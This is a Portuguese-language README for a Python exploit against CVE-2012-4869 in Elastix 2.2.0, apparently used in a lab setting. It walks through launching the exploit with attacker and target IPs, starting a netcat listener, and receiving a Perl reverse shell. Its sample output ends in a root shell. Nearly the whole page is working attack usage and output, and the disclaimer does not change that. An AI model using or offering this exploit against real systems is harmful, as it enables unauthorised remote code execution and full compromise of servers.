
Script de exploit em Python para a vulnerabilidade LFI no Elastix 2.2.0 (CVE-2012-4869) que permite execução remota de código através de injeção de payload de reverse shell em Perl.
Este script explora uma vulnerabilidade de Inclusão de Arquivo Local (LFI) no Elastix 2.2.0, permitindo execução remota de código (RCE) ao injetar comandos através do endpoint callme_page.php. O exploit é baseado em CVE-2012-4869.
requestsInstale as dependências usando:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
Antes de executar o exploit, inicie um listener Netcat na sua máquina:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
Este exploit é apenas para fins educacionais e de teste de segurança autorizado. O uso não autorizado é ilegal. O autor não se responsabiliza pelo uso indevido desta ferramenta.